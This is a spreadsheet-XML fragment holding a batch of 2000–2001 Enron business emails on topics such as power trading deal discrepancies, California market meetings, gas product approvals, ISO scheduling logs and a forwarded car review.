Chapman/HOU/ECT@ECT, Carol Moffett/HOU/EES@EES, Karen K Heathman/HOU/ECT@ECT, _x000D_
Liz M Taylor/HOU/ECT@ECT, Nicki Daw/NA/Enron@Enron, Karen Owens/HOU/EES@EES, _x000D_
Leasa Lopez/HOU/EES@EES _x000D_
Subject: California Action and Next Steps Meeting. Monday, January 22_x000D_
_x000D_
From Dan Leff:_x000D_
_x000D_
A California discussion meeting has been scheduled for Monday, January 22, _x000D_
immediately following the Executive Committee Meeting (approximately 12 _x000D_
p.m.).  _x000D_
Thank you._x000D_
_x000D_
Dan Leff_x000D_
_x000D_
_x000D_
Rosalee - Can you please let me know if the Board Room is available for this _x000D_
meeting (it's late Friday afternoon and I am unable to find out this _x000D_
information).   I will call you on Monday.  Thanks for your help._x000D_
_x000D_
Kathy Dodgen_x000D_
3-6077_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: implementation of smothing algorithm for forward forward_x000D_
 volatilities calculation</t>
  </si>
  <si>
    <t xml:space="preserve">Review for Tue._x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/07/2000 _x000D_
03:57 PM ---------------------------_x000D_
_x000D_
_x000D_
Tanya Tamarchenko_x000D_
12/07/2000 03:54 PM_x000D_
To: Wenyao Jia/HOU/ECT@ECT_x000D_
cc: Rabi De/NA/Enron@ENRON, Jaesoo Lew/NA/Enron@ENRON, Naveen _x000D_
Andrews/Corp/Enron@ENRON, Vince J Kaminski/HOU/ECT@ECT, Vladimir _x000D_
Gorny/HOU/ECT@ECT _x000D_
Subject: Re: implementation of smothing algorithm for forward forward _x000D_
volatilities calculation  _x000D_
_x000D_
Winston, _x000D_
I am sending you the documentation on the new methodology for creating ffvols_x000D_
from implied vols. This methodology requires some minimization procedure_x000D_
to fit the given vol curve with a smoothing function. I am sending you the_x000D_
code I wrote that performs minimization with simulated annealing method from _x000D_
Numerical Recipes._x000D_
_x000D_
We might need to discuss some details. Please, let me know if you have _x000D_
questions._x000D_
_x000D_
Tanya._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 05:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pattim@morgangroup.com'})</t>
  </si>
  <si>
    <t>Re: DINNER!</t>
  </si>
  <si>
    <t xml:space="preserve">Patti, can you believe that out of all those dates you offered that Jeff is _x000D_
only available on October 14?!  I have penciled it in on his calendar as has _x000D_
Rebecca.  We'll look forward to more details.  Thanks, and have a wonderful _x000D_
time in Cabo!  I'm so envious!!!  Sherri_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Patti Morgan" &lt;pattim@morgangroup.com&gt; on 11/12/2000 05:32:34 AM_x000D_
To: &lt;jskilli@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: DINNER!_x000D_
_x000D_
_x000D_
_x000D_
Jeff,_x000D_
?_x000D_
Hi!? Mike and I want to get a few couples  together for a casual dinner.? We _x000D_
would like you and Rebecca to join  us.? I thought I'd run a few dates by you _x000D_
and see if any of these  work:_x000D_
?_x000D_
Fri. Oct. 6_x000D_
Fri. Oct. 13_x000D_
Sat. Oct. 14_x000D_
Sat. Oct. 28_x000D_
Fri. Nov. 3_x000D_
Sat. Nov.4_x000D_
?_x000D_
As you can see from our schedule, we are pretty  open!? Let me know._x000D_
?_x000D_
Patti_x000D_
?_x000D_
P.S. We really enjoyed seeing your centerfold photo  the other month.? Was _x000D_
this a trial run for a potential, more revealing  spread??_x000D_
?_x000D_
?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 06:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Deal 459243.01</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, I don't know where Jeff's head was today, but he just checked with _x000D_
Prebon and found he had done this deal without even knowing it! So he entered _x000D_
it - Deal #461171._x000D_
_x000D_
Thanks a lot for your patience, Stephanie._x000D_
_x000D_
_x000D_
Stephanie Piwetz   11/16/2000 02:32 PM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Deal 459243.01  _x000D_
_x000D_
thanks_x000D_
One more Richter trade,. prebon shows:  11/16_x000D_
_x000D_
Enron Buys Aquila_x000D_
Dec  2000_x000D_
sp15_x000D_
97.00_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes                11/16/2000 04:13 PM_x000D_
_x000D_
To: Stephanie Piwetz/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Deal 459243.01  _x000D_
_x000D_
Prebon is sending a new confirmation with Constellation as the counterparty. _x000D_
Broker mistake. _x000D_
_x000D_
_x000D_
Stephanie Piwetz   11/16/2000 01:00 PM_x000D_
_x000D_
To: Carla Hoffman/PDX/ECT@ECT, Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal 459243.01_x000D_
_x000D_
Hello_x000D_
I have a question, should the Counterparty on this trade be Peco Energy?_x000D_
We have Constellation but bro does not know trade as Constellation_x000D_
_x000D_
Tom Alonso's name is on bro confirm (Peco) but deal 459243.01 is under Mark _x000D_
Fischer (COnstellation)_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 09:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Pathfinder review</t>
  </si>
  <si>
    <t xml:space="preserve">		_x000D_
_x000D_
		_x000D_
		_x000D_
		?EDMUNDS' REVIEW_x000D_
		_x000D_
		Nissan's hardy Pathfinder has always been our vehicle of choice for seeking a _x000D_
new path to the premium outlet center. Though the exterior may exude that _x000D_
tough-guy outdoorsy image, the interior has always been comfortable enough _x000D_
for the dilettante woodsman who doesn't like to get his nails too dirty. _x000D_
Though the old 3.3-liter V6 engine provided acceptable levels of low-end _x000D_
grunt, the coarsely produced 170 horsepower it made was meager when stacked _x000D_
against newer competitors. _x000D_
		So revel, all you who seek liberation from urban ennui -- the Pathfinder is _x000D_
finally energized by a stouter V6, based on the Maxima sedan's stellar _x000D_
powerplant. When mated to a five-speed manual transmission, the 3.5-liter, _x000D_
DOHC V6 engine produces a mighty 250 horsepower and 240 foot-pounds of _x000D_
torque. Matching it to an automatic tranny will usurp 10 ponies but add 25 _x000D_
foot-pounds of twist, still ample power to haul plenty of equipment and go _x000D_
mountain climbing, as well as merge onto freeways without fear. _x000D_
		The Pathfinder comes with rear-wheel or part-time four-wheel drive, the _x000D_
latter of which provides a shift-on-the-fly transfer case that can be engaged _x000D_
at speeds up to 50 mph. On LE models, an automatic All-Mode four-wheel-drive _x000D_
system can be specified for 2001, giving you one more reason to skip paying _x000D_
the extra tariff the Infiniti QX4 commands. All-Mode operates in 2WD, _x000D_
automatic 4WD, 4WD-Hi and 4WD-Lo, all selected using a simple rotary knob on _x000D_
the dashboard. _x000D_
		We've long admired the Pathfinder for its excellent ride and handling, _x000D_
further enhanced by solid unibody construction. The interior, one of the _x000D_
friendliest of any SUV on the market, is spruced up for 2001 with an updated _x000D_
instrument panel. A new dual level center console with a padded armrest and _x000D_
12-volt power source will organize all your gewgaws. _x000D_
		You can choose from three trim levels -- the XE, which for the 2001 model _x000D_
year comes with standard power windows, mirrors and locks, and a security _x000D_
system; the sporty SE, which gives you a choice of automatic or manual _x000D_
transmission along with sporty trim; and the top-of-the-line LE, which _x000D_
includes fog lights, Bose audio system, and fake wood accents. _x000D_
		All models come standard with 16-inch wheels, full-size spare tire, a CD _x000D_
player and ABS. Side airbags can be ordered as long as they are contained in _x000D_
leather-wrapped seating, which is available only on SE and LE. Those same _x000D_
models, when power is transferred to the drive wheels via an automatic _x000D_
transmission, can be equipped with a mobile entertainment system, which _x000D_
includes a 6.4-inch flip-down LCD screen, video player, and ports to plug and _x000D_
play a PlayStation 2 (And we all know how important that will be after _x000D_
Christmas, don't we?). A "Birdview" navigation system, shared with the _x000D_
Infiniti QX4, is also available, but we don't recommend it. While the _x000D_
"Birdview" perspective is interesting, teensy, tiny, little, itty-bitty _x000D_
buttons control the thing, along with some of the climate control functions. _x000D_
Get a map. _x000D_
		Items that remain static from last year include a substantial maximum cargo _x000D_
carrying capacity of 85 cubic feet (surprising for what appears to be a _x000D_
relatively small vehicle). Some of this space, in our humble opinion, should _x000D_
have been used to alleviate the still-cramped rear accommodations. _x000D_
		Despite a few quibbles, we're thrilled that Nissan finally rectified the _x000D_
Pathfinder's main problem -- horsepower. With this updated, competitive _x000D_
package, we're betting fat rebates and dealer incentives have gone the way of _x000D_
the Dodo. </t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 02:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eric@ehirst.com'})</t>
  </si>
  <si>
    <t>Re: Outline for Project on Real-Time Markets</t>
  </si>
  <si>
    <t xml:space="preserve">Contact Steve Walton_x000D_
_x000D_
_x000D_
_x000D_
=09Eric Hirst &lt;Eric@EHirst.com&gt;_x000D_
=0911/10/2000 10:03 AM_x000D_
=09=09=20_x000D_
=09=09 To: Skean@enron.com (Steve Kean)_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Outline for Project on Real-Time Markets_x000D_
_x000D_
Dear Steve,_x000D_
_x000D_
Once again, I call on you for advice. Who, within Enron, should I talk with=_x000D_
=20_x000D_
about a new project I am working on, related to real-time balancing=20_x000D_
operations and markets (all the messy stuff that causes so many problems=20_x000D_
within all the existing ISOs)?_x000D_
_x000D_
Here is the outline for the project. Can you send me your suggestions on=20_x000D_
revising the outline, other people at Enron (and elsewhere) to contact=20_x000D_
related to these markets, and written materials on how the various ISO=20_x000D_
markets operate.=20_x000D_
_x000D_
Thanks._x000D_
_x000D_
Eric_x000D_
----------------_x000D_
ISSUES TO DISCUSS FOR PROJECT ON:_x000D_
REAL-TIME BALANCING OPERATIONS AND MARKETS_x000D_
November 6, 2000_x000D_
_x000D_
1. Introduction: Importance of real-time operations and markets=20_x000D_
Essential for reliability, especially security=20_x000D_
Basis for all forward contracts (hour- and day-ahead, block monthlies,=20_x000D_
bilaterals)=20_x000D_
Real-time prices motivate generation-capacity decisions: new construction,=_x000D_
=20_x000D_
repowering, retirements=20_x000D_
Ensure equitable treatment for =01&amp;new=018 intermittent and distributed res=_x000D_
ources=20_x000D_
2. Physical Requirements and Operations=20_x000D_
Balance generation to load in near-real time (intrahour)=20_x000D_
Normal conditions (frequency response, CPS1, CPS2)=20_x000D_
Contingency conditions (DCS)=20_x000D_
In neither case is it necessary for generation to exactly balance load over=_x000D_
=20_x000D_
short time periods (e.g., 10 minutes), but must balance energy over longer=_x000D_
=20_x000D_
intervals=20_x000D_
Benefits of aggregation=20_x000D_
Performance and characteristics of individual generation and load resources=_x000D_
:=20_x000D_
random fluctuations, energy level, ramp rate, acceleration rate, startup=20_x000D_
time, minimum run time, block loading, energy-limited characteristics of=20_x000D_
hydro units, etc=20_x000D_
Control-area balance vs individual-schedule balance, good vs bad inadverten=_x000D_
t=20_x000D_
interchange=20_x000D_
NERC and FERC requirements=20_x000D_
3. Operations with Vertically Integrated Utilities=20_x000D_
Unit commitment=20_x000D_
Economic dispatch=20_x000D_
Regulation=20_x000D_
Contingency reserves=20_x000D_
Control area forecasts of loads and resources, effects of forecasts on unit=_x000D_
=20_x000D_
commitment and dispatch=20_x000D_
Treatment of (payments and penalties for) energy imbalance and inadvertent=_x000D_
=20_x000D_
interchange=20_x000D_
4. RTO Operations and Markets=20_x000D_
Generation not owned by RTO, RTO must purchase outputs from generation and=_x000D_
=20_x000D_
load resources=20_x000D_
Relationship between real-time operations and markets, how are resources=20_x000D_
dispatched (and by whom) and how are they compensated=20_x000D_
Time interval (1, 5, 10, or 15 minutes) for dispatch and price setting; wha=_x000D_
t=20_x000D_
are the tradeoffs in choosing among these intervals=20_x000D_
Single market-clearing price in each interval vs pay-as-bid for each resour=_x000D_
ce=20_x000D_
Pay for energy only or pay also for maneuverability (e.g., ramp and=20_x000D_
acceleration rates); how do resource constraints determine which resources=_x000D_
=20_x000D_
are permitted to set the market-clearing price and which aren't, and why?=_x000D_
=20_x000D_
Set prices ex ante or ex post? If prices set ex ante, what is the basis for=_x000D_
=20_x000D_
the value?=20_x000D_
Should unit commitment (resource scheduling) be done by individual supplier=_x000D_
s,=20_x000D_
by RTO, or both?=20_x000D_
Relationship between real-time markets and ICAP and RMR requirements, and R=_x000D_
TO=20_x000D_
requirements to ICAP and RMR units to bid resources into real-time market=_x000D_
=20_x000D_
Treatment of exports and imports, rules governing interchange scheduling=20_x000D_
(number of schedule changes per hour permitted, ramp rates for schedule=20_x000D_
changes)=20_x000D_
To what extent does the RTO make short-term forecasts of load and generatio=_x000D_
n,=20_x000D_
how far into the future (10 minutes to 24 hours), how does the RTO use thes=_x000D_
e=20_x000D_
forecasts? Should the RTO commit and dispatch resources on the basis of=20_x000D_
expected future conditions (i.e., beyond the current and next interval)? Wh=_x000D_
o=20_x000D_
pays for these RTO decisions?=20_x000D_
Should RTO publish prices and let demand and supply respond to the price=20_x000D_
signal, or should RTO dispatch resources up and down based on supplier bids=_x000D_
?=20_x000D_
If the RTO explicitly dispatches resources, should uninstructed deviations =_x000D_
be=20_x000D_
treated differently, in terms of payment or penalties, from instructed=20_x000D_
deviations? What about a resource=01,s failure to follow instructions?=20_x000D_
Under what circumstances should RTO go =01&amp;out-of-market=018 for resources?=_x000D_
 What=20_x000D_
should set the price of (payment to) these resources?=20_x000D_
Under what conditions, if any, are penalties appropriate, for what kinds of=_x000D_
=20_x000D_
behavior, what determines the magnitude of the penalty? Should penalties=20_x000D_
apply to generation only or to loads also?=20_x000D_
How, if at all, should capacity assigned to ancillary services (especially=_x000D_
=20_x000D_
the reserve services) be incorporated into real-time operations and markets=_x000D_
?=20_x000D_
For example, should the capacity assigned to contingency reserves be set=20_x000D_
aside and used only when a major outage occurs? Or should such reserves be=_x000D_
=20_x000D_
used routinely whenever it is economic to do so, as long as sufficient=20_x000D_
capacity is available to meet the NERC reserve requirements?=20_x000D_
How should intermittent resources (e.g., wind) be treated in real-time=20_x000D_
operations and markets? Should they be treated any differently from a large=_x000D_
,=20_x000D_
volatile load?=20_x000D_
Can retail loads participate in real-time markets? How?=20_x000D_
5. Case Studies of U.S. ISOs=20_x000D_
California=20_x000D_
PJM, New York, and New England=20_x000D_
ERCOT=20_x000D_
 6. Conclusions and Recommendations=20_x000D_
Key features of operations and markets=20_x000D_
What works=20_x000D_
What are the options=20_x000D_
What problems still remain=20_x000D_
_x000D_
----------------------------------------------_x000D_
Eric Hirst_x000D_
Consulting in Electric-Industry Restructuring_x000D_
106 Capital Circle_x000D_
Oak Ridge, TN 37830_x000D_
865-482-5470 (phone &amp; fax)    Eric@EHirst.com_x000D_
http://www.EHirst.com/=20_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 07:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--2/5/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 02/05/2001 _x000D_
03:06 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Veronica Espinoza @ ENRON                                              _x000D_
               02/05/2001 02:16 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Larry Joe Hunter/HOU/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Kim S _x000D_
Theriot/HOU/ECT@ECT, Melinda Whalen/CAL/ECT@ECT, Dianne Seib/CAL/ECT@ECT, _x000D_
Janie Aguayo/HOU/ECT@ECT, Derek Bailey/Corp/Enron@ENRON, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Ellen Wallumrod/NA/Enron@ENRON, Celeste _x000D_
Cisneros/NA/Enron@Enron, Diane Anderson/NA/Enron@Enron, Tiffany _x000D_
Williams/NA/Enron@Enron, Cindy Feldman/CAL/ECT@ECT, Patricia _x000D_
Boulanger/CAL/ECT@ECT, Linda Sietzema/CAL/ECT@ECT, Sharon _x000D_
Crawford/CAL/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Russell _x000D_
Diamond/HOU/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Nidia Mendoza/HOU/ECT@ECT, _x000D_
Jeffrey C Gossett/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, Darron C _x000D_
Giron/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, _x000D_
Veronica Gonzalez/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Jean _x000D_
Bell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Credit Report--2/5/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 05:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cdalpho@columbiaenergygroup.com', 'mflewellyn@columbiaenergygroup.com', 'dkinney@columbiaenergygroup.com', 'bperron@columbiaenergy.com'})</t>
  </si>
  <si>
    <t>Gas Daily Pricing for April</t>
  </si>
  <si>
    <t xml:space="preserve">I have some suggested Gas Daily pricing on the attached.  I will discuss this _x000D_
with Charlie._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 12:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dynomitetnt8433@aol.com', 'gsteggy@aol.com', 'tulsadad@att.net', 'mtedrow99@hotmail.com', 'larry_f_campbell@enron.com', 'tulsama@worldnet.att.net', 'gmcvp1@aol.com', 'ddhickman@hotmail.com', 'stink17@prodigy.net', 'kingvp@aol.com', 'aaron@qeraser.com', 'revayg@yahoo.com', 'muslstang@aol.com', 'thefoxs@flash.net', 'skipper99mr@yahoo.com', 'neelyshaw@aol.com', 'lanehart@midsouth.rr.com', 'vi_dare@yahoo.com', 'vpsuny@aol.com', 'physics123@yahoo.com', 'stp19992000@yahoo.com', 'bonnie71955@aol.com', 'thechalford@aol.com', 'npryse@hotmail.com', 'meldenkey@yahoo.com', 'camwhite@cs.com', 'ljdanker@hotmail.com', 'wvanpelt@aol.com', 'umenos@gte.net', 'mboyce4961@aol.com', 'lsabbara@aol.com'})</t>
  </si>
  <si>
    <t>Second Job.jpg</t>
  </si>
  <si>
    <t>?_x000D_
 - Second Job.jpg</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 10:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.hodge@enron.com', 'stacy.dickson@enron.com'})</t>
  </si>
  <si>
    <t>US Gas Phy Index approval required</t>
  </si>
  <si>
    <t xml:space="preserve">Is OK w/you to copy the profile below, for the new gas product at the end of _x000D_
this email?  _x000D_
----- Forwarded by Tana Jones/HOU/ECT on 10/24/2000 04:59 PM -----_x000D_
_x000D_
	Lisa Lees_x000D_
	10/24/2000 04:58 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: US Gas Phy Index approval required_x000D_
_x000D_
Tom Moran has approved the suggestion directly below regarding customer _x000D_
profiles for uploading.  _x000D_
_x000D_
Please let me know if you agree.  _x000D_
_x000D_
Thanks._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 10/24/2000 04:46 PM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Lisa Lees                                                             _x000D_
10/24/2000 03:15 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Tom Moran/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: US Gas Phy Index approval required_x000D_
_x000D_
Shall we copy customer profiles for US Gas Phy Index Fwd Firm non-TX &gt;1Mo&lt; _x000D_
1Yr._x000D_
_x000D_
Need to know by end of day today._x000D_
_x000D_
Thanks again.  LL_x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 10/24/2000 03:07 PM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Melba Lozano                                                           _x000D_
  10/19/2000 05:47 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Mark Taylor/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, _x000D_
Rudi Zipter/HOU/ECT@ECT, Bjorn Hagelmann/HOU/ECT@ECT, Anne _x000D_
Bike/Corp/Enron@Enron_x000D_
cc: Robert B Cass/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT _x000D_
Subject: US Gas Phy Index approval required_x000D_
_x000D_
Your review and approval of the following product type in the EOL Datamanager _x000D_
is needed (for directions on approval , please see steps for approval at the _x000D_
bottom of this e-mail).  _x000D_
_x000D_
_x000D_
Trader:  Tori Kuykendall_x000D_
EXAMPLE:_x000D_
_x000D_
_x000D_
US Gas Phy Index_x000D_
_x000D_
US Gas Phy Index Fwd Firm non-TX &gt;1Mo&lt;1Yr (RESTRICTED)_x000D_
_x000D_
_x000D_
US Gas Phy Index       IF EPSJ Blanco Avg           Oct00-Dec00         USD/MM_x000D_
_x000D_
A US Gas Transaction with Enron North America Corp., under which Seller shall _x000D_
sell and Buyer shall purchase a quantity of natural gas equal to the Daily _x000D_
Contract Quantity at the Contract Price on a firm basis. The volumes _x000D_
scheduled to be delivered are subject to reductions due to normal operational _x000D_
constraints on the El Paso Natural Gas Pipeline. The reductions caused by _x000D_
these constraints are excused nonperformance and are not considered a failure _x000D_
to receive or deliver firm gas. The Contract Price shall be derived from the _x000D_
Index, as adjusted by the price submitted by Counterparty via the website. _x000D_
The Period of Delivery shall be from the Effective Date through the _x000D_
Termination Date._x000D_
The term of the Transaction shall be from the Effective Date of 01 Oct 2000 _x000D_
to the Termination Date of 31 Oct 2000._x000D_
The transaction is for delivery at El Paso San Juan Blanco non-Bondad._x000D_
The Index for a month shall be the El Paso Natural Gas Co. - San Juan Basin _x000D_
price as listed in the section entitled "Prices of Spot Gas Delivered to _x000D_
Pipelines", published in the first issue in such month of Inside Ferc's Gas _x000D_
Market Report._x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
The unit of measure against which the price is quoted shall be millions of _x000D_
British thermal units and the quantity shown shall be in millions of BTUs per _x000D_
day.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_x000D_
  _x000D_
Thanks - Rob Cass  -  Melba Lozano_x000D_
x35491   x58986_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 19:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 3;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/25/01; HourAhead hour: 3;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in SC Trades schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042503.txt_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 3 / Preferred: -575.00 / Final: -574.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/25/01_x000D_
  TRADING_SC: NES1_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 3 / Preferred:   1.96 / Final:   1.93)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/25/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 01:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beth.apollo@enron.com'})</t>
  </si>
  <si>
    <t>CRM system</t>
  </si>
  <si>
    <t xml:space="preserve">Does Vanessa know anything about this?  I know that we had a definite _x000D_
interest several years ago in a system from Siebel.  We shelved it at the _x000D_
time due to IT resource constraints and Philippe's concern over costs.  In _x000D_
the meantime, EES bought a license and uses this system.  I know that Mary _x000D_
was resurrecting this with someone on her team.  She had recently reviewed it _x000D_
with Brenda Herod, I believe.  This is one of the items that we listed in _x000D_
Dallas as a need if we were to get heavily into providing services for _x000D_
others.  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 04/04/2001 08:27 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Richard Sage_x000D_
04/03/2001 05:25 PM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CRM system_x000D_
_x000D_
Sally,_x000D_
I gather that Mary has taken extended leave._x000D_
Can you advise who might know anything about this system?_x000D_
_x000D_
Thanks,_x000D_
Richard_x000D_
_x000D_
---------------------- Forwarded by Richard Sage/LON/ECT on 03/04/2001 23:22 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Richard Sage_x000D_
19/03/2001 15:59_x000D_
To: Mary Solmonson/Enron@EnronXGate_x000D_
cc:  _x000D_
_x000D_
Subject: CRM system_x000D_
_x000D_
Mary,_x000D_
Are you around - your voicemail message has said you were out for the day, _x000D_
for weeks._x000D_
We have a need for a CRM system, but not a very complicated one, and I _x000D_
thought that the one that Tony Mends demonstrated a couple of years ago might _x000D_
fit the bill. He tells me that it is in your area of responsibilities!_x000D_
_x000D_
Thanks,_x000D_
Richard_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>New AZ. Power Plant</t>
  </si>
  <si>
    <t>Article on groundbreaking of first of [possibly] several new large IPP plan=_x000D_
ts=20_x000D_
near Palo Verde..._x000D_
_x000D_
_x000D_
Pinnacle West buys plant, readies expansion_x000D_
Pinnacle West Energy, a generation subsidiary of Pinnacle West Capital, has=_x000D_
=20_x000D_
bought a 72- MW power station from Sierra Pacific Resources subsidiary Neva=_x000D_
da=20_x000D_
Power and plans to add a 500-MW facility at the site._x000D_
_x000D_
The purchase of the Harry Allen power station, located 30 miles northeast o=_x000D_
f=20_x000D_
Las Vegas, totaled $65.2 million, after adjustments for purchased power=20_x000D_
commitments, and is part of Sierra Pacific=01,s ongoing divestiture program=_x000D_
. The=20_x000D_
sale agreement calls for all power generated by the station to be sold unde=_x000D_
r=20_x000D_
contract to Nevada Power through February 2003._x000D_
_x000D_
Calling the purchase =01&amp;a strategic link=018 in efforts to increase genera=_x000D_
tion in=20_x000D_
the West, Pinnacle  West said that, as demand grows in the region, it inten=_x000D_
ds=20_x000D_
to add a 500-MW, gas-fired, combined-cycle unit at its new site._x000D_
_x000D_
=01&amp;This is a very important step in our overall growth strategy to remain =_x000D_
one=20_x000D_
of the top power producers in the West,=018 Pinnacle West Energy President =_x000D_
Bill=20_x000D_
Stewart said. =01&amp;There are tremendous opportunities to expand the capacity=_x000D_
 at=20_x000D_
this site, and it=01,s ideally situated to help meet the increasing demand=_x000D_
=20_x000D_
through the Southwest.=018  Fueled by natural gas or diesel oil, the Harry =_x000D_
Allen=20_x000D_
station currently produces electricity for southern Nevada and surrounding=_x000D_
=20_x000D_
markets._x000D_
_x000D_
In addition to the Nevada project, Pinnacle West has been actively developi=_x000D_
ng=20_x000D_
other generation in the region. The company has set Dec. 19 as the=20_x000D_
groundbreaking for its 2,120-MW Redhawk Power Plant, the largest of its=20_x000D_
current power projects. Located near the Palo Verde nuclear plant, 55 miles=_x000D_
=20_x000D_
west of Phoenix, the facility will help meet increasing demands for=20_x000D_
electricity in Arizona and throughout the Southwest, according to Stewart.=_x000D_
=20_x000D_
The Redhawk project=01,s first two units are slated to begin commercial=20_x000D_
operation in the summer of 2002.</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 00:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Congratulations on your promotion</t>
  </si>
  <si>
    <t>Congratulations on your promotion!_x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
Eugenio</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 01:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jere.overdyke@enron.com'})</t>
  </si>
  <si>
    <t>Re: Producer Insurance Targets</t>
  </si>
  <si>
    <t xml:space="preserve">Jere, please forward the list of targets. Let me speak initially with John - _x000D_
lets try and get this done today.  I appreciate the effort on the peakers.  _x000D_
As well, I would suggest we start discussions with  Reeding &amp; Bates which _x000D_
according to both Redmond and Thompson is a live deal._x000D_
_x000D_
Thanks_x000D_
Delainey_x000D_
